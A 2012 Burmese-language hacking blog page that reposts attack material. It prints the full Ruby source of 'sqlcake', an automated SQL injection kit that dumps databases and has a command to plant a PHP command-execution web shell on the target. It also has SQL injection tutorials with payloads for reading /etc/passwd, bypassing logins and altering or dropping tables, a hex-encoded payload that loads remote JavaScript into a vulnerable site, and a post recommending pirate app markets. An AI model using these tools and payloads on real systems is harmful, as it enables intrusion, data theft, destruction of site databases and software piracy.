Mr.Cracker က ပို႕စ္ကို ကြန္႕ျပီး ေရးတာပါ ေရွ႕က ေျပာသလိုပဲ ေျပာေစ ပ်က္ေစ ကလက္ေစ သက္သက္ပါ ေက်းဇူးတင္ပါတယ္


source from ghostarea.net
Read More ->>

Monday, May 28, 2012

sql cake for SQL auto exploitation kit


This is posted by Dongoth.....
Thank to MHF

ဒီ script ကိုသံုးဖို ့ဆို
1) စက္ထဲမွာ ruby language ကို install လုပ္ရပါမယ္...
2) dir ဆီမွန္ေအာင္ cmd box ကေနသြားလိုက္ယံုပါပဲ ..


Code

#!/usr/bin/ruby

# sqlcake _ sql auto exploitation kit _ v1.1b
# written by impuls <impuls23@safe-mail.net>
# http://impuls23.edublogs.org
#
# automatic dump database & interactive sql shell tool
# dumps the current database structure including
# tables and columns and turns into an interactive
# mysql prompt. mysql specific special commands are:
#
# hex:[str]       => to sql-hex a string for magic quotes bypassing, e.g. hex:hello
# dropshell:[str] => drops a php shell (param x) (magic quotes must be deactivated),
#                 => e.g. dropshell:/var/www/exec.php | /exec.php?x=ps
# dump:[str]      => to dump a specific table, e.g. dump:mysql.users
# blind:[on/off]  => toggle blind sql injection mode
#
# parameter setup:
#
# -u => set target URI ["http://www.example.com/x.php?id=2&cat=5"]
# -p => set target parameter ["id"]
# -e => set error string for union selecion ["_fetch"]
# -d => set error escape string [" /*"]
# -b => use blind sql injection mode
# -f => write data to output file
# -x => skip database dump


require 'getoptlong'
require 'net/http'

print %q!

       _________________________________
      /                                 \
           sql auto exploitation kit
      \_________________________________/

             version: v1.1b (beta)


!


opts = GetoptLong.new(
  ["--help", "-h",     GetoptLong::NO_ARGUMENT],
  ["--uri", "-u",      GetoptLong::REQUIRED_ARGUMENT],
  ["--param", "-p",    GetoptLong::OPTIONAL_ARGUMENT],
  ["--error","-e",     GetoptLong::OPTIONAL_ARGUMENT],
  ["--delim", "-d",    GetoptLong::OPTIONAL_ARGUMENT],
  ["--file", "-f",     GetoptLong::NO_ARGUMENT],
  ["--blind", "-b",    GetoptLong::NO_ARGUMENT],
  ["--skipdump", "-x", GetoptLong::NO_ARGUMENT]
)

@params = Hash.new()

opts.each do |opt, arg|
  @params["#{opt}"] = arg
end


def get(uri)

  uri = URI(URI.encode(uri))
  res = Net::HTTP.get_response(uri)
  uri = res.body
  return uri
end


def get_data(uri, ident, query)
 
  target = uri.gsub(/\+(.+)?(#{ident})/,"+\\1" +
  "(SeLeCT+CoNcAt(0x3A,0x21,0x21,0x7B,0x7B,0x7B,(#{query})," +
  "0x7D,0x7D,0x7D,0x21,0x21,0x3A,0x0D,0x0A))")
  return get(target).scan(/:!!{{{(.*)}}}!!:/).uniq.join
end


def get_data_blind(uri, query)
 
  true_resp = get(uri + "+aNd+1=1" + @escape_str)
 
  i = 0
 
  while 1
    resp = get(uri + "+aNd+(SeLeCT+leNgTh((#{query}))=#{i})" + @escape_str)
    if (resp == true_resp)
      break
    else
      i += 1
    end
  end
 
  length = i + 1
  curpos = 1
 
  val = String.new()
 
  sql = "+aNd+(SeLeCT+aScii(suBstRiNg("
 
  while curpos < length
   
    resp = get(uri + sql + "(#{query}),#{curpos},1))<51)" + @escape_str)
   
    if(resp == true_resp)
      i_s = 0
      i_e = 51
    else
      resp = get(uri + sql + "(#{query}),#{curpos},1))<101)" + @escape_str)
      if(resp == true_resp)
        i_s = 50
        i_e = 101
      else
        resp = get(uri + sql + "(#{query}),#{curpos},1))<151)" + @escape_str)
        if(resp == true_resp)
          i_s = 100
          i_e = 151
        else
          resp = get(uri + sql + "(#{query}),#{curpos},1))<201)" + @escape_str)
          if(resp == true_resp)
            i_s = 150
            i_e = 201
          else
            i_s = 200
            i_e = 255
          end
        end
      end
    end
   
    while(i_s < i_e)
      resp = get(uri + sql + "(#{query}),#{curpos},1))=#{i_s})" + @escape_str)
      if (resp == true_resp)
        print i_s.chr
        val += i_s.chr
        curpos += 1
        break
      else
        i_s += 1
      end
    end
  end
  puts "\n"
  return val
end


def hex_str(str)
 
  chars = str.split(/ */)
  hex_val = "0x"
  chars.each do |c|
    hex_val += c.ord.to_s(16)
  end
 
  return hex_val
end


def dump_columns(uri, ident, table)
 
  i = 0
 
  if table.match(/\./)
    schema = hex_str(table.scan(/^(.*)\./).join)
    table  = hex_str(table.scan(/\.(.*)$/).join)
    while 1
      if (@bm == 1)
        res = get_data_blind(uri, "SeLeCT+CoNcAt(table_schema,0x2E,table_name,0x2E,column_name)" +
        "FrOm+information_schema.columns+WhErE+table_schema+=+#{schema}+aNd+" +
        "table_name+=+#{table}+LiMiT+#{i},1")
      else
        res = get_data(uri, ident, "SeLeCT+CoNcAt(table_schema,0x2E,table_name,0x2E,column_name)" +
        "FrOm+information_schema.columns+WhErE+table_schema+=+#{schema}+aNd+" +
        "table_name+=+#{table}+LiMiT+#{i},1")
      end
      if res.length > 1
        @columns << res
        puts res
        write_logfile(res + "\n") if @lfname
        i += 1
      else
        break
      end
    end
  else
    table = hex_str(table)
    while 1
      if (@bm == 1)
        res = get_data_blind(uri, "SeLeCT+CoNcAt(table_schema,0x2E,table_name,0x2E,column_name)" +
        "FrOm+information_schema.columns+WhErE+table_name+=+#{table}+LiMiT+#{i},1")
      else
        res = get_data(uri, ident, "SeLeCT+CoNcAt(table_schema,0x2E,table_name,0x2E,column_name)" +
        "FrOm+information_schema.columns+WhErE+table_name+=+#{table}+LiMiT+#{i},1")
      end
      if res.length > 1
        @columns << res
        puts res
        write_logfile(res + "\n") if @lfname
        i += 1
      else
        break
      end
    end
  end
end


def dump_information_schema(uri, ident)
 
  i = 0
   
  while 1
    if (@bm == 1)
      res = get_data_blind(uri, "SeLeCT+CoNcAt(table_schema,0x2E,table_name)" +
      "FrOm+information_schema.tables+WhErE+table_schema+!=+" +
      hex_str("information_schema") +
      "+LIMIT+#{i},1")
    else
      res = get_data(uri, ident, "SeLeCT+CoNcAt(table_schema,0x2E,table_name)" +
      "FrOm+information_schema.tables+WhErE+table_schema+!=+" +
      hex_str("information_schema") +
      "+LIMIT+#{i},1")
    end
    if res.length > 1
      @tables << res
      puts res if (@bm < 1)
      write_logfile(res + "\n") if @lfname
      i += 1
    else
      break
    end
  end 
end


def dump_data(uri, ident, table)
 
  dfields = []
 
  i = 0
 
  @columns.each do |c|
    if c.match(/#{table}\.(.*)$/)
      dfields << $1
      i += 1
    end
  end
 
  if (i > 0)
 
    puts dfields.join(":")
    write_logfile(dfields.join(":") + "\n\n") if @lfname
    print "\n\n"
   
    i = 0
   
    while 1
      if (@bm == 1)
        res = get_data_blind(uri, "SeLeCT+CoNcAt(" + dfields.join(",0x3A,") +
        ")+FrOm+#{table}+LiMiT+#{i},1")
      else
        res = get_data(uri, ident, "SeLeCT+CoNcAt(" + dfields.join(",0x3A,") +
        ")+FrOm+#{table}+LiMiT+#{i},1")
      end
      if res.length > 1
        @columns << res
        puts res
        write_logfile(res + "\n") if @lfname
        i += 1
      else
        break
      end
    end
  end
end


def drop_php_shell(uri, ident, path)
 
  target = uri.gsub(/\+(.+)?(#{ident})/,"+\\1" +
  "(SeLeCT+0x3C3F706870207072696E7420223C7072" +
  "653E223B73797374656D28245F4745545B2778275D" +
  "293B3F3E3C212D2D)")
 
  target += "+INTO+OUTFILE+'#{path}'"
 
  get(target)
end


def get_ident(uri, ident)
 
  i = 0
  ident = ident.to_i
  while i < ident
    target = uri.gsub(/\+(.+)?(#{i})/,"+\\1CoNcAt" +
    "(0x3A,0x21,0x21,0x21,0x3A,0x7B,0x21,0x7D,0x3A,0x21,0x21,0x21,0x3A)")
    if get(target).match(/:!!!:{!}:!!!:/)
      return i.to_s
      break
    end
    i += 1
  end
end


def run_sql_shell(uri, ident)
 
  while 1
    print "mysql> "
    cmd = STDIN.gets.chop
    break if cmd == "quit"
    if cmd.match(/^hex:(.*)/)
      puts hex_str($1)
    elsif cmd.match(/^dropshell:(.*)/)
      drop_php_shell(uri, ident, $1)
    elsif cmd.match(/^blind:(.*)/)
      if($1 == "on")
        @bm = 1
        puts "Blind mode is ON!"
      else
        @bm = 0
        puts "Blind mode is OFF!"
      end
    elsif cmd.match(/^dump:(.*)/)
      if (@tables.length > 0)
        dump_columns(uri, ident, $1)
        dump_data(uri, ident, $1)
      else
        puts "No database structure available!"
      end
    else 
      if (@bm == 1)
        get_data_blind(@default_uri, cmd)
      else
        puts get_data(uri, ident, cmd)
      end
    end 
  end
end


def move_param(uri, param)
 
  val = uri.scan(/((&)|(\?))(#{param}=.[0-9a-zA-Z.,:;\/\\-_+{}\[\]*%~!?|<>^=]*)/).join.gsub("&&","").gsub("??","")

  if uri.match(/#{val}$/)
    return uri
  else
    uri = uri.gsub(/#{val}(&)?/, "") + "&#{val}"
    return uri
  end
end


def exploit_sql(uri)
 
  if(!uri.match(/^http(s)?:\/\//))
    uri = "http://" + uri
  end
 
  if(@params["--param"])
    uri = move_param(uri, @params["--param"])
  end
 
  @default_uri = uri

  err   =  @error_resp
  esc   =  @escape_str
  uri  +=  "+UnIOn+SeLeCT+"                                                     
  val   =  "1"
  res   =  err
 
  puts "[*] Writing data to #{@lfname}" if (@lfname)
 
  if (@bm != 1)
    print "[*] Getting column count..."
   
    while (res.match(err))
        val += "\x2C" + (val.match(/\d\d?\d?$/)[0].to_i.next).to_s
        res = get(uri + val + esc)   
    end
   
    uri += val
    print "\n"
    puts  "[*] Target URI: " + @default_uri
    print "[*] Searching identifier..."
    ident = get_ident(uri, val.match(/(\d*)$/)[0].to_s)
    print "\n"
   
    if (ident == nil)
      puts "[*] Can't find identifier (#{err})"
      puts "[*] Using blind SQL injection mode\n\n"
      @bm = 1
    end
   
    puts "[*] Using identifier: " + ident + "\n\n" if (ident != nil)
  else
    puts "[*] Using blind SQL Injection mode\n\n"
  end
 
 
  if(@skip_db_dump < 1)
   
    puts "[*] Dumping tables...\n\n"
   
    if (@bm == 1)
      dump_information_schema(@default_uri, 0)
    else
      dump_information_schema(uri, ident)
    end

  end

  run_sql_shell(uri, ident)
end


def create_logfile()

  @lfname = "sqlcake_" + Time.now.strftime("%Y-%m-%d-%H%M%S") + ".txt"
 
  File.open(@lfname, "w") do |f|
    f.print "SQL AXP started at #{Time.now}\n\n"
  end
end


def write_logfile(data)

  if(@lfname)
    File.open(@lfname, "a") do |f|
      f.print data
    end
  end
end


def help()

print %q!sqlcake _ sql auto exploitation kit _ v1.1b
written by impuls <impuls23@safe-mail.net>

automatic dump database & interactive sql shell tool
dumps the current database structure including
tables and columns and turns into an interactive
mysql prompt. mysql specific special commands are:

hex:[str]       => to hex a string for magic quotes bypassing, e.g. hex:hello
dropshell:[str] => drops a php shell (param x) (magic quotes must be deactivated),
                => e.g. dropshell:/var/www/exec.php | /exec.php?x=ps
dump:[str]      => to dump a specific table, e.g. dump:mysql.users
blind:[on/off]  => toggle blind sql injection mode

parameter setup:

-u => set target URI ["http://www.example.com/x.php?id=2&cat=5"]
-p => set target parameter ["id"]
-e => set error string for union selecion ["_fetch"]
-d => set error escape string [" /*"]
-b => use blind sql injection mode
-f => write data to output file
-x => skip database dump

!

exit 0
end

@skip_db_dump = 0
@bm = 0

@error_resp = @params["--error"] || "_assoc"
@escape_str = @params["--delim"] || "\x20\x2D\x2D"

@tables  = []
@columns = []

if (!@params["--uri"])
  help()
end

if (@params["--help"])
  help()
end

if (@params["--file"])
  create_logfile()
end

if (@params["--blind"])
  @bm = 1
end

if (@params["--skipdump"])
  @skip_db_dump = 1
end

exploit_sql(@params["--uri"]) 

sqlcake.rb ( extension rb ဆိုတာမေမ့ပါနဲ ့)

အက်ယ္ကိုေအာက္ပါလင့္တြင္သြာၾကည့္ႏိုင္ပါသည္......။
http://mmhackforums.noonhost.com/sql-cake-for-sql-auto-exploitation-kit-vt730.html
Read More ->>

How to Install Paid Android Applications For Free







Android Tablet တစ္လံုး အသစ္၀ယ္လာတာနဲ႕ ဘာအလုပ္မွမလုပ္ပဲ အဲ့ဒါပဲ ႏႈိက္ေနတာ စာလည္း မဖတ္ အလုပ္လည္း မလုပ္ပဲ ကလိေနေတာ့ အိမ္ကေတာင္ မ်က္ေစာင္းထိုးေနျပီ ေစ်းကလည္း တစ္သိန္းေက်ာ္ပဲ ဆုိေတာ့ ကလိေပ်ာ္ပါတယ္ ထံုးစံအတုိင္း Android နယ္ပယ္မွာလည္း Hacking ကုိ ကလိလိုက္ခ်င္ေသးတယ္ :-D
ကဲ အလကားမေပးတဲ့ Application ေတြကို ပိုက္ဆံမေပးပဲရေအာင္ ၾကံရေအာင္
သိပ္ခက္ခက္ခဲခဲၾကီးေတာ့ မဟုတ္ပါဘူး Application တစ္ခု ခံျပီး သြင္းရံုပါပဲ.. Application နာမည္ကေတာ့
Applet Market ပါ သူက ပိုက္ဆံေပးရတဲ့ Application ေတြကို အခမဲ့ ေပးတဲ့ Service တစ္ခုပါပဲ Download & Install တန္းလုပ္ရံုပါပဲ Applet Market ကိုေတာ့ ပံု မွာပဲ Click ျပီး Download လုပ္ႏိုင္ပါတယ္


သူ႕လုိပဲ အလုပ္လုပ္တဲ့ Application ကေတာ့ Black Market ပါ အသံုးျပဳပံုလည္း မကြာပါ ေအာက္မွာ Download လုပ္ႏုိင္ပါတယ္


စမ္းၾကည့္ရင္ အဆင္ေျပမယ္ထင္ပါတယ္ ေနာက္တစ္ေန႕ေတာ့ Hacking နဲ႕ပတ္သတ္တဲ့ Android Application ေတြရွာျပီး ေပးပါ့မယ္ Download Link ေတြက သိပ္အဆင္မေျပေသးလို႕ စုေနပါတယ္ Android Tips & Trick ကေလးေတြလည္း တင္ျဖစ္မယ္ထင္ပါတယ္

source by ghostarea.net
Read More ->>

Saturday, May 26, 2012

2 Sql injection tutorials By Ghost Area


This Post is copied from www.ghostarea.net


SQL Injection Ultimate Tutorial

SQL Injection ဆိုတာ MySql DataBase ထဲက User Data ေတြကို Inject လုပ္ႏုိင္တဲ့ Vulnerability တစ္ခုပါ SQL Injection အေၾကာင္းမေျပာခင္ MySQL DataBase ဆိုတာ ဘာ SQL ဆိုတာ ဘာ ဆိုတာအရင္ၾကည့္ရေအာင္
DataBase ဆိုတာကေတာ့ ရွင္းပါတယ္ Data အစုအေ၀းေပါ့
SQL ဆုိတာကေတာ့ Structure Query Language လို႕ေခၚတဲ့ Language တစ္ခုျဖစ္ျပီး Data ေတြကို သိမ္းဆည္ဖို႕ စီစဥ္ဖို႕ အထူးျပဳေရးဆြဲထားေသာ Language တစ္ခုျဖစ္ပါတယ္ ။
MySql ဆုိတာကေတာ့ ခုနက SQL Language ကို အသံုးျပဳျပီး ေရးသားထားေသာ နာမည္ေက်ာ္ DataBase Management System ေတြထဲက နာမည္အၾကီးဆံုး Open Source DataBase Management System တစ္ခုျဖစ္ပါတယ္
MySql မွာ Data ေတြကို Table မ်ားျဖင့္ ထားရွိပါတယ္ Tabel ထဲကမွ Column , Roll ဆိုျပီး ထပ္ခြဲထားပါေသးတယ္ ဥပမာ

No. First Name Second Name
1 Negative Thunder
2 Ghost Area
3 John Smith

ဆိုျပီး ဒီလိုထားပါတယ္ အဲ့ဒီ့ Tabel နာမည္ကို Hacktivism လို႕ထားရေအာင္
Query ဆုိတာကေတာ့ အဲ့ဒီ့ Table ထဲက Data ေတြကို ေတာင္းခံတဲ့ Request ေတြျဖစ္ပါတယ္ Select* ဆုိတာနဲ႕စျပီး Sql Language ရဲ႕ အဓိက Operation တစ္ခုျဖစ္ပါတယ္ ဥပမာ Query တစ္ေၾကာင္းကို ၾကည့္ရေအာင္
SELECT * FROM Hacktivism WHERE Second_Name=’Thunder’;
ဒီလို Query ေရးလိုက္ရင္ Negative Thunder ရဲ႕ Data ေတြ လက္ခံရရွိပါလိမ့္မယ္ ။ ဒါဆိုရင္ေတာ့ SQL နဲ႕ Query ေတြအေၾကာင္း နည္းနည္းသိသြားေလာက္ပါျပီ
ဒါဆို SQL Injection အေၾကာင္း ဆက္ရေအာင္ 
SQL Injection ဆိုတာ User Input ကို ေကာင္းစြာ Filter လုပ္မထားေသာ Developer ရဲ႕ အမွားက တစ္ဆင့္ User Data ေတြကို Inject လုပ္ျခင္းပါ
ပထမဆံုး Vuln ျဖစ္ပံု ေတြနဲ႕ Exploit Code နမူနာနဲ႕ Attacking လုပ္ပံုေတြကို တစ္ခ်က္ၾကည့္ရေအာင္ 
exploit.php ရဲ႕ Code ကေလးတစ္ခ်က္ၾကည့္ရေအာင္
<?php
$id = $_GET['id'];
$result = mysql_query( “SELECT name FROM members WHERE id = ‘$id’”);
?>

ၾကည့္လိုက္ရင္ သိသာပါတယ္ User Input တစ္ခုျဖစ္တဲ့ id ကို Filter လုပ္ထားျခင္းမရွိပါ ဒီေတာ့ 
http://site.com/exploit.php?id=1+union+all+select+1,null,load_file(‘e tc/passwd’),4–
ဆိုျပီး Browser က တစ္ဆင့္ Request ေတာင္းလိုက္ရင္ ect/passwd Directory က passwrd File တက္လာပါ့မယ္ ဒါကို Out File Injection လုိ႕လည္း ေခၚပါေသးတယ္ ( ခုနက Request မွာသံုးသြားတဲ့ union ဆိုတာကေတာ့ select statement တစ္ခုထက္ပိုျပီး သံုးခ်င္တဲ့အခါမွာသံုးပါတယ္ , load_file ဆုိတာကေတာ့ Server ထဲက File ကို Load လုပ္လိုက္တာပါ )
ဒုတိယ တစ္မ်ိဳးၾကည့္ရေအာင္ပါ .

ဒီတစ္ေခါက္ေတာ့ exploit2.php ရဲ႕ Code ေပါ့
$postsender = $_POST['username'];
$postpass = md5($_POST['password']);
$resultat = mysql_query(“SELECT * FROM ” . $tablestart . “login WHERE brugernavn = ‘$postsender’ AND password = ‘$postpass’”)
or die(“<p>” . mysql_error() . “</p>\n”);


သူ႕မွာလည္း Variable ေတြကို ေသခ်ာဂရုမစိုက္ထားျပန္ဘူး ဒီတစ္ခါေတာ့
username:a or 1=1–
password:blank


ဒီလို Inject လုပ္လုိက္တဲ့အခါမွာ သြားတဲ့ Sql Query က ဒီလိုျဖစ္သြားပါလိမ့္မယ္
SELECT USER from database WHERE
username=’a’ or 1=1


ဒီလိုဆို 1=1 က true or true ျဖစ္ျပီး User Access ကိုလက္ခံသြားပါလိမ့္မယ္...


SQLI Part 2 : Attacking Examples

Part 1 : မွာေတာ့ SQL ဆိုတာဘာ MySQL ဆိုတာ ဘာ Query ေတြအေၾကာင္း နဲ႕ Attacking Example ႏွစ္ခုကို ေရးခဲ့ပါတယ္ ဒီေန႕ေတာ့ အျခားေသာ Attacking Example ေတြနဲ႕ Exploit ေတြကို ဆက္ပါ့မယ္ ။
ဒီ Tutorial မွာေတာ့ URL Bar မွာမဟုတ္ပဲ User Input ထည့္ခြင့္ရေသာ ေနရာမွန္သမွ် မွာ Inject လုပ္မယ့္ Attacking Mode ေတြကို Example ေတြနဲ႕ ေျပာျပပါ့မယ္ ။ ဥပမာ Search Box လိုေနရာမ်ိဳး Email Address Input လုပ္ရတဲ့ေနရာလိုမ်ိဳးမွာေပါ့
Shopping Site တစ္ခုရဲ႕ Search Form ဆိုပါစို႕ အဲ့ဒီ့ Search Form ဟာ ေစ်း၀ယ္တဲ့ User ေတြ ၀ယ္လို႕တဲ့ကုန္ပစၥည္းကို ရွာေဖြဖို႕လုပ္ထားတာပါ ဒါေပမယ့္ အဲ့ဒီ့ Search Form ဟာ Filter ခံဖို႕ လြတ္ေနပါတယ္ ဥပမာ ဒီလိုေပါ့
if (txtFilter.Text.Length > 0)(
strSQL += ” WHERE ProductName Like ‘” + txtFilter.Text + ‘”;)

အဲ့ဒါဆိုရင္ Attacker က
milk’ UNION Select 0, username,password 0 from users –

ဒီလို Query ေရးလိုက္ရင္ ( milk ဆိုတာ Example Item ပါ ) User Name Password ေတြ တက္လာပါလိမ့္မယ္ ။


 

အဲ့ဒီလိုပဲအျခားေသာ Attack အေနနဲ႕
4.Updating Table
ဒီတစ္ခါေတာ့ DataBase Table ၾကီးကို Update လုပ္ပစ္ပါ့မယ္ ဥပမာ.
milk’ ; UPDATE site_database SET site_email = ‘admin@site.com’ WHERE email =’attacker@email.com; –
ဒါကေတာ့ Example ပဲျပတာပါ site_email က Website Admin Mail ကို Attacker ေမးလ္ကို ေျပာင္းပစ္တဲ့ Example ပါ
အဲ့ဒီလို Inject လုပ္ရင္ Query မွာ
SELECT site_email , site_passwd, site_login_id, site-last_name FROM members WHERE site_email = ‘milk’ ; UPDATE site_database SET site_email = ‘admin@site.com’ WHERE email =’attacker@email.com; –
ဒီလို Request ျဖစ္သြားတာေၾကာင့္ Table Update ျဖစ္သြားပါတယ္
5.Adding New Record
ဒီတစ္ခါေတာ့ DataBase မွာ Record အသစ္ထည့္မွာပါ
milk’;INSERT INTO site_customers (‘site-email’,site-password’,'site-login_id’,site-lastname’) VALUES (‘attcker@email.com’,'hello’,'attacker’,'hacking attacker’);–
site_customer ထဲကို Attacker ဟာ သူ႕ရဲ႕ Record ေတြထည့္လုိက္တဲ့ Injecting Code ပါ အဲ့ဒီလို Inject လုပ္လုိက္ရင္ Query မွ
SELECT site_email , site_passwd, site_login_id, site-last_name FROM members WHERE site_email =’milk’;INSERT INTO site_customers (‘site-email’,site-password’,'site-login_id’,site-lastname’) VALUES (‘attcker@email.com’,'hello’,'attacker’,'hacking attacker’);–
ျဖစ္ျပီး Record တစ္ခု ထပ္ထည့္ျပီးသားျဖစ္သြားပါလိမ့္မယ္ ။
6.Identifying Table
ဒီတစ္ခါေတာ့ Table တက္လာေအာင္လုပ္ၾကည့္ရေအာင္ ။
milk’ AND 1=(SELECT COUNT(*) FROM mytable); –

ဒီ Code ကိုသာ Inject လုပ္မယ္ဆုိရင္ Query မွာ
SELECT site_email , site_passwd, site_login_id, site-last_name FROM members WHERE site_email =’milk’ AND 1=(SELECT COUNT(*) FROM mytable); –
လို႕ Request လုပ္ျပီး Table ေတြတက္လာပါလိမ့္မယ္
7.Deleting Table
ဒီတစ္ခါေတာ့ Tabel ကို Delete လုပ္မွာပါ
milk’DROP TABLE Creditcard; –

ဒီ Code ကိုသာ Inject လုပ္လုိက္ရင္ SQL Query က
SELECT site_email , site_passwd, site_login_id, site-last_name FROM members WHERE site_email =’milk’DROP TABLE Creditcard; –

လို႕ Request လုပ္သြားျပီး Table ကို Delete လုပ္သြားပါ့မယ္

 

Read More ->>

Social Engineering Hacking (myanmar e-book)


ကၽြန္ေတာ့္ေဘာ္ဒါ Ethickiddie ရဲ႕ ေနာက္ဆံုးထြက္စာအုပ္ပါ.....။ social engineering ကိုနားလည္ခ်င္သူမ်ားအတြက္ လက္ေဆာင္ေကာင္းတစ္ခုပါပဲ...........။ေအာက္ပါလင့္ကေနေဒါင္းလိုက္ပါ...

http://www.mediafire.com/view/?woeuv8d66obb0hc
Read More ->>

Saturday, May 19, 2012

Ghost in the wire : Ken Mitnick



ဟိုတစ္ေန႕က India က စကားေျပာေနတဲ့ တစ္ေယာက္နဲ႕ စကားေျပာရင္း သူ႕ဆိုဒ္ကိုလာျပတယ္ ဒါနဲ႕ သူ႕ဆုိဒ္မွာ ဟိုေမႊဒီေမႊလုပ္ရင္း Ghost in the Wire ကိုအလကားေပးထားတာေတြ႕တယ္ စာအုပ္ကို ဖတ္ခ်င္ေနတာၾကာပါျပီ Amazon မွာ စထြက္တုန္းက ၂၅ ေဒၚလာဆိုလို႕ မ၀ယ္တာ အခု အလကားရျပီးမွ ျပန္သြားၾကည့္လိုက္ေတာ့ ၁၁ ေဒၚလာပဲရွိတယ္ မ၀ယ္ေတာ့ပါဘူး တကယ္လို႕ ၀ယ္ခ်င္သူမ်ားေတာ့
http://www.amazon.com/Ghost-Wires-Adventures-Worlds-Wanted/dp/0316037702
မွာသြား၀ယ္ႏုိင္ပါတယ္ အခု ကၽြန္ေတာ္တင္ေပးဖုိ႕ေတာင္ နည္းနည္းစဥ္းစားမိတယ္ သူမ်ား စီးပြားေရးမ်ား တုတ္နဲ႕ထုိးသလိုမ်ားျဖစ္ေနမလားလို႕..အရင္ က အဲ့ေလာက္မဟုတ္ေပမယ့္ Ubuntu စသြင္းျပီးကတည္းက License ေတြ ကို နည္းနည္း အားနာလာမိတယ္ Software Cracking လုပ္ခ်င္လို႕ Ubuntu ပဲရွိတဲ့ Laptop မွာ Window တြဲတင္ဖို႕ကို License Version ၀ယ္ဖို႕ မတတ္ႏုိင္လို႕ တြန္႕ေနတာ ( တင္ေတာ့ တင္ရမွာပဲ မတတ္ႏုိင္ဘူး နည္းနည္း လြတ္ေအာင္ Virtual Box နဲ႕ပဲတင္မလားလို႕) :-D ဒါေပမယ့္ လည္း ကၽြန္ေတာ္က စီးပြားေရးအရ လုပ္ေနတာမဟုတ္ပဲ Sharing လုပ္ေနတာဆိုေတာ့ Ken Mitnick ၾကီးခြင့္လႊတ္ေကာင္းပါရဲ႕
စာေမးပြဲေၾကာင့္ အစအဆံုးဖတ္ႏုိင္ျခင္းမရွိေသးပါဘူး :-D ဟီး ဟိုလွန္ဒီလွန္လုပ္ရင္း လိုက္ၾကည့္ေနရတံုးရွိပါေသးတယ္  သူ႕ဘ၀ဇာတ္ေၾကာင္းေလးကို ပံုေလးေတြပါထည့္ေပးထားတာေတြ႕ရပါတယ္
Download လုပ္ဖို႕ေတာ့ ပံုကိုပဲ Click လိုက္ရင္ အဆင္ေျပသြားပါျပီ ^_^


SOURCE BY WWW.GHOSTAREA.NET
Read More ->>

Monday, May 14, 2012

How to change manual injection to auto sql injector



ကိုတုတ္ေကာက္ေရးသာထားတာျဖစ္ပါတယ္.......။ဒီပိုစ့္ကို ေကာ္ပီပိုစ့္အျဖစ္မသတ္မွတ္ေစခ်င္ပါဘူး....ဘာလို႕
လဲဆိုေတာ့ဒီ Tutorial ကို ကၽြန္ေတာ္က စုေဆာင္းသိမ္းထားခ်င္လို႕ ဆိုက္ေပၚတင္ထားလိုက္တာပါ...။
ေရးသာသူကိုတကယ္ ေက်းဇူးတင္ပါတယ္...........။

How to change manual injection to auto sql injector !

ေခါင္းစဥ္ အရေတာ့ ဘာမွန္းမသိၿဖစ္ေနမွာပဲ :laugh2: .. let's start the show.. ok :laughingneqw:

column ရွာတာေလာက္ေတာ့ သိၾကမယ္ထင္ပါတယ္... ခုေအာက္က ေဖာက္မယ့္ ဆိုက္ဒ္မွာ ၁၁ခုရွိတယ္.. ဘယ္ဟာ vul ၿဖစ္ေနမလဲဆိုတာကိုဆက္ရွာပါမယ္....
[x] step-1


vul ၿပေနတဲ့ 4 ေနရာမွာ .. ေအာက္က code ကိုအစားထိုးလိုက္ပါမယ္...

%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f796f75726a6176617363726970742e636f6d2f3131333031323032303231322f73716c2e6a73223e3c2f7363726970743e%29%29
[x] step-2
 ကဲ .. code က load ေခၚလိုက္တဲ့အတြက္ ... auto injector ကဝင္လာပါၿပီ .. ကလစ္ေလးေတြေထာက္ၿပီး .. information ေတြဆက္ယူၾကရံုပါပဲ ...

[x] step-3

 table ေတြဆြဲထုတ္တာပါ ... have fun with auto injector .. :dance2: :dance2:
က်ေနာ္က chrome သမားမို ့လို ့ chrome နဲ ့ပဲ စမ္းထားတာပါ ..
note : ဘယ္ HF ဘယ္ abh ကမွမဟုတ္ပါဖူး..priv8 ..
code credit to my fri....


source from MHF
Read More ->>

ROCK FOREVER (MUSIC)

Pageviewers

CBOX

Manutd-Results

Label

Android (3) autorun (3) Backtrack (8) batch file (19) blogger (10) Botnet (2) browser (5) Brute Force (6) cafezee (2) cmd (5) Cookies (2) crack (12) Cracking (2) crypter (7) DDos (20) deepfreeze (4) defacing (1) defence (16) domain (4) Dos (9) downloader (4) ebomb (2) ebook (48) Exploit (26) firewall (3) game (2) gmail (11) google hack (16) Hacking Show (3) Hash (4) hosting (1) icon changer (1) ip adress (6) Keygen (1) keylogger (8) knowledge (67) locker (1) maintainence (8) network (17) news (31) other (35) passwoard viewer (7) password (12) Philosophy (6) Phishing (8) premium account (2) proxy (7) RAT (10) run commands (4) script (27) Shell code (10) shortcut Key (2) SMTP ports (1) social engineering (7) spammer (1) SQL Injection (30) Stealer.crack (5) tools (125) Tools Pack (4) tutorial (107) USB (3) virus (32) website (84) WiFi (4) word list (2)

Blogger templates

picoodle.com

Blogger news

Print Friendly and PDF

HOW IS MY SITE?

Powered by Blogger.

Followers

About Me

My Photo
Hacking= intelligent+techonology+psychology